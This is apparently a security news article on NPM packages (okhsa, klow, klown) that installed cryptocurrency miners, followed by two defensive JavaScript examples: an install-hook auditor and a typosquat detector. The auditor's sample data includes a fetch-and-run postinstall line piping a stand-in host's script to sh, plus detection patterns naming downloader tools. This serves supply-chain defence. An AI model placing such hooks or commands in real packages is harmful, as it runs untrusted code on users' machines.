New NPM Malware Mines Cryptocurrency on Windows, Linux, macOS Devices

Sonatype's automated malware detection system has recently discovered several cryptocurrency-mining malware samples targeting Windows, Linux and macOS devices.

The miners were disguised as legitimate JavaScript libraries and were found in three packages uploaded to the official NPM registry.

Malicious Packages

The three malicious packages are:

  • okhsa
  • klow
  • klown

All three packages were disguised as User-Agent header parsers and were uploaded by the same author on October 15th. They were detected almost immediately, and the researchers reported them to the NPM security team.

NPM promptly removed the packages from the registry, but by the time of removal they had already been downloaded more than 150 times.

According to the report, only klow and klown actually contained the cryptocurrency miner; okhsa carried no miner of its own but declared the other two as dependencies, so installing okhsa pulled the malicious code in transitively.

During installation, a .bat (Windows) or .sh (Linux/macOS) script was dropped onto the user's system according to the platform. The script then downloaded a miner binary, a Windows EXE or a Linux ELF, from an external host and launched it with command-line arguments specifying:

  • Mining pool
  • Cryptocurrency wallet address
  • Number of processor threads to use

The miner runs silently in the background of the infected system, so the whole process stays hidden from the user. It is still unclear how the operators of these packages lured developers into installing them.
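The install-time behaviour described above (a lifecycle hook that drops a platform script, fetches a binary and launches it) is something a dependency audit can look for before `npm install` ever runs the hook. The following is an added example, not code from Sonatype or from the packages in the article: it walks a set of package manifests, flags `preinstall`/`install`/`postinstall`/`prepare` scripts that show download-and-execute indicators, and also flags direct dependencies on the three names reported here. All manifests, script bodies and the non-article package names (`left-padder`, `fancy-fonts`, `native-thing`) are constructed for illustration.

```javascript
// Added example (not Sonatype's tooling): audit npm manifests for install-time
// lifecycle hooks that fetch and run external code, the pattern used by the
// klow/klown/okhsa packages. Every manifest and script body below is constructed.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Names reported as malicious in the article; a real blocklist would come from a feed.
const KNOWN_BAD = new Set(['okhsa', 'klow', 'klown']);

// Indicators of "drop a platform script, download a binary, run it in the background".
const INDICATORS = [
  { id: 'platform-script', re: /\.(bat|cmd|sh)\b/i },
  { id: 'downloader',      re: /\b(curl|wget|certutil|Invoke-WebRequest|bitsadmin)\b/i },
  { id: 'remote-url',      re: /https?:\/\/[^\s"']+/i },
  { id: 'background-exec', re: /\b(start \/B|nohup|&\s*$)/i },
  { id: 'node-script',     re: /\bnode\s+\S+\.js\b/i },
];

// Returns one finding per suspicious hook or blocklist hit in a single package.json object.
function auditManifest(manifest) {
  const findings = [];
  const name = manifest.name || '<unnamed>';
  if (KNOWN_BAD.has(name)) {
    findings.push({ package: name, hook: null, reason: 'known-malicious' });
  }
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const hits = INDICATORS.filter(i => i.re.test(cmd)).map(i => i.id);
    // Any install hook deserves a look; one with indicators is high severity.
    findings.push({ package: name, hook, command: cmd, indicators: hits,
                    severity: hits.length ? 'high' : 'review' });
  }
  // A dependency on a known-bad package is itself a finding (the okhsa case).
  for (const dep of Object.keys(manifest.dependencies || {})) {
    if (KNOWN_BAD.has(dep)) {
      findings.push({ package: name, hook: null, reason: `depends-on:${dep}` });
    }
  }
  return findings;
}

// Audits a whole tree of manifests (e.g. every package.json under node_modules).
function auditTree(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests: one clean, the three from the article, one
// obvious downloader, and one legitimate native build hook.
const SAMPLE = [
  { name: 'left-padder', version: '1.0.0', scripts: { test: 'mocha' } },
  { name: 'okhsa', version: '0.0.1', dependencies: { klow: '*', klown: '*' } },
  { name: 'klown', version: '0.0.1',
    scripts: { preinstall: 'start /B node preinstall.js & node preinstall.js' } },
  { name: 'fancy-fonts', version: '2.1.0',
    scripts: { postinstall: 'curl -s http://example.invalid/x.sh | sh' } },
  { name: 'native-thing', version: '3.0.0', scripts: { install: 'node-gyp rebuild' } },
];

for (const finding of auditTree(SAMPLE)) {
  console.log(JSON.stringify(finding));
}
```

The `review` severity on `native-thing` is deliberate: legitimate packages with native add-ons run `node-gyp rebuild` from an install hook, so the audit separates "has an install hook" from "has an install hook that downloads and executes something". The blunt mitigation, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), would have stopped these packages from running anything at install time, at the cost of breaking packages that genuinely need a build step.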

Sonatype adds that it continues to track the following classes of malware hiding in software repositories:

  • Brandjacking
  • Typosquatting
  • Cryptomining
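Brandjacking and typosquatting both rely on a package name that is close to, but not the same as, a well-known one. The following is an added example, not Sonatype's tooling: a pre-install name check that compares a requested package name against a curated list of popular packages using edit distance, separator stripping and scope reuse. The `POPULAR` list is a constructed stand-in for a real curated allowlist, and the distance thresholds are illustrative heuristics.

```javascript
// Added example (not Sonatype's tooling): flag dependency names that look like
// typosquats or brandjacks of well-known packages. POPULAR is a constructed
// stand-in for a curated list; thresholds are illustrative heuristics.

const POPULAR = ['lodash', 'express', 'react', 'chalk', 'request', 'moment', 'axios'];

// Classic single-row dynamic-programming edit distance (insert/delete/substitute cost 1).
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];       // dp[i-1][j-1] for the current j
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];    // dp[i-1][j], needed as next diag
      prev[j] = Math.min(
        prev[j] + 1,                                        // deletion
        prev[j - 1] + 1,                                    // insertion
        diag + (a[i - 1] === b[j - 1] ? 0 : 1),             // substitution
      );
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Strip scope and separators so "lo-dash", "lo.dash" and "@x/lodash" all collapse to "lodash".
function normalize(name) {
  return name.toLowerCase().replace(/^@[^/]+\//, '').replace(/[-_.]/g, '');
}

// Returns { name, verdict: 'ok' | 'suspicious', reasons: [...] } for one requested name.
function checkName(candidate, popular = POPULAR) {
  if (popular.includes(candidate)) return { name: candidate, verdict: 'ok', reasons: [] };
  const norm = normalize(candidate);
  const scopeMatch = candidate.match(/^@([^/]+)\//);
  const scope = scopeMatch ? scopeMatch[1] : null;
  const reasons = [];
  for (const p of popular) {
    if (normalize(p) === norm) {
      reasons.push(`separator/scope variant of ${p}`);
    } else {
      const d = levenshtein(candidate, p);
      // Allow a little more slack for longer names, where one typo is more likely.
      const limit = p.length >= 6 ? 2 : 1;
      if (d <= limit) reasons.push(`edit distance ${d} from ${p}`);
    }
    // Brandjacking via scope: "@lodash/anything" borrows a name its real owner never used.
    if (scope && normalize(scope) === normalize(p)) {
      reasons.push(`scope @${scope} borrows the name of ${p}`);
    }
  }
  return { name: candidate, verdict: reasons.length ? 'suspicious' : 'ok', reasons };
}

// Constructed sample of requested names: exact matches, typos, separator and scope variants.
const REQUESTED = ['lodash', 'lodahs', 'expres', 'lo-dash', '@lodash/core', 'left-pad'];

for (const name of REQUESTED) {
  console.log(JSON.stringify(checkName(name)));
}
```

The check is intentionally noisy on short names: with a threshold of one edit, `reach` would be flagged against `react`. In practice that is the right trade-off for a pre-install gate that asks a human to confirm, and the wrong one for a fully automated block, so tune the thresholds and the curated list to the team's own dependency set.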

In July 2021, two other malicious NPM packages were found in the registry; they were capable of stealing credentials from the Google Chrome browser on Windows systems and also acted as spyware, installing backdoors on the affected machines.


Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
